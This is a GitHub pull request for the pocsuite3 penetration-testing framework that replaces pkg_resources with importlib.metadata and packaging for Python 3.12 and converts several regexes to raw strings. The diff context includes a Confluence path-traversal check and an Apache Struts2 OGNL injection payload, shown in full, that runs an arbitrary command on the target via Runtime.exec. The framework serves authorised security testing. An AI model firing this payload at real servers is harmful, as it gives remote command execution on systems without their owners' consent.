Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

replace pkg_resources for python 3.12 #420

Merged
merged 4 commits into from
Apr 29, 2024
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -148,7 +148,7 @@ The usage is roughly the same as docker’s command line parameters.

## Requirements

- Python 3.7+
- Python 3.8+
- Works on Linux, Windows, Mac OSX, BSD, etc.

## Installation
Expand Down
4 changes: 2 additions & 2 deletions pocsuite3/lib/core/register.py
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
import re
import pkg_resources
from importlib import metadata
import importlib.machinery
import importlib.util
from importlib.abc import Loader
Expand Down Expand Up @@ -56,7 +56,7 @@ def check_requires(data):
import_name = install_name
__import__(import_name)
try:
ver = pkg_resources.get_distribution(install_name).version
ver = metadata.version(install_name)
except Exception:
ver = 'unknown'
logger.info(f'{install_name}=={ver} has been installed')
Expand Down
4 changes: 2 additions & 2 deletions pocsuite3/lib/core/settings.py
Original file line number Diff line number Diff line change
Expand Up @@ -39,7 +39,7 @@
"Usage of pocsuite for attacking targets without prior mutual consent is illegal."
)

BANNER = """\033[01;33m
BANNER = r"""\033[01;33m
,------. ,--. ,--. ,----. \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
| .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. |
| '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' <
Expand All @@ -57,7 +57,7 @@
BOLD_PATTERNS = (
"' is vulnerable",
"success",
"\d ",
r"\d ",
)

OLD_VERSION_CHARACTER = ("from comm import cmdline", "from comm import generic")
Expand Down
4 changes: 2 additions & 2 deletions pocsuite3/lib/core/update.py
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
from pocsuite3.lib.core.data import logger, conf
from six.moves.xmlrpc_client import ServerProxy
from pkg_resources import parse_version
from xmlrpc.client import ServerProxy
from packaging.version import parse as parse_version
from pocsuite3 import __version__


Expand Down
2 changes: 1 addition & 1 deletion pocsuite3/lib/utils/__init__.py
Original file line number Diff line number Diff line change
Expand Up @@ -283,7 +283,7 @@ def gen_cert(countryName='',

def minimum_version_required(ver):
from pocsuite3 import __version__
from pkg_resources import parse_version
from packaging.version import parse as parse_version
v1, v2 = parse_version(ver), parse_version(__version__)
if v1 > v2:
logger.warning(f'The minimum version required for this PoC plugin is {ver}, '
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -16,7 +16,7 @@
from typing import get_type_hints, Union

import chardet
from pkg_resources import parse_version
from packaging.version import parse as parse_version
from pocsuite3.lib.core.log import LOGGER as logger
from pocsuite3.lib.yaml.nuclei.protocols.common.expressions.safe_eval import safe_eval

Expand Down
6 changes: 3 additions & 3 deletions pocsuite3/modules/spider/__init__.py
Original file line number Diff line number Diff line change
Expand Up @@ -73,9 +73,9 @@ def get_links(self, url, url_ext=()):
def get_redirect_url(url):
# TODO:
# regex need more test cases
meta_regex = '(?is)\<meta[^<>]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*'
body_regex = '''(?is)\<body[^<>]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*'''
js_regex = '''(?is)<script.*?>[^<>]*?location\.(?:replace|href|assign)[=\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?</script>'''
meta_regex = r'(?is)\<meta[^<>]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*'
body_regex = r'''(?is)\<body[^<>]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*'''
js_regex = r'''(?is)<script.*?>[^<>]*?location\.(?:replace|href|assign)[=\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?</script>'''

resp = requests.get(url)
true_url = resp.url
Expand Down
2 changes: 1 addition & 1 deletion pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py
Original file line number Diff line number Diff line change
Expand Up @@ -36,7 +36,7 @@ def _verify(self):
r = requests.post(paylaod, data=data, headers=headers)

if r.status_code == 200 and "</web-app>" in r.text:
m = re.search('<web-app[\s\S]+<\/web-app>', r.text)
m = re.search(r'<web-app[\s\S]+<\/web-app>', r.text)
if m:
content = m.group()[:limitSize]
result['FileInfo'] = {}
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -31,7 +31,7 @@ def _options(self):

def _check(self):
result = {}
exec_payload = "(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\[email protected]@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\[email protected]@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\[email protected]@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))"
exec_payload = r"(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\[email protected]@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\[email protected]@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\[email protected]@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))" # noqa: E501
paylaod = exec_payload.format(cmd=quote("id"))
r = requests.get(self.url + "?" + paylaod)
if "groups=" in r.text:
Expand All @@ -52,7 +52,7 @@ def _attack(self):
result = {}
if p:
cmd = self.get_option("command")
exec_payload = "(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\[email protected]@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\[email protected]@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\[email protected]@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))"
exec_payload = r"(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\[email protected]@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\[email protected]@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\[email protected]@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))" # noqa: E501
payload = exec_payload.format(cmd=quote(cmd))
r = requests.get(self.url + "?" + payload)
if r.text:
Expand Down
5 changes: 3 additions & 2 deletions setup.py
Original file line number Diff line number Diff line change
Expand Up @@ -34,7 +34,7 @@ def find_packages(where='.'):
zip_safe=False,
packages=find_packages(),
include_package_data=True,
python_requires='>=3.6',
python_requires='>=3.8',
entry_points={
"console_scripts": [
"pocsuite = pocsuite3.cli:main",
Expand All @@ -57,7 +57,8 @@ def find_packages(where='.'):
"dacite",
"PyYAML",
"lxml",
"docker"
"docker",
"packaging"
],
extras_require={
'complete': [
Expand Down
Loading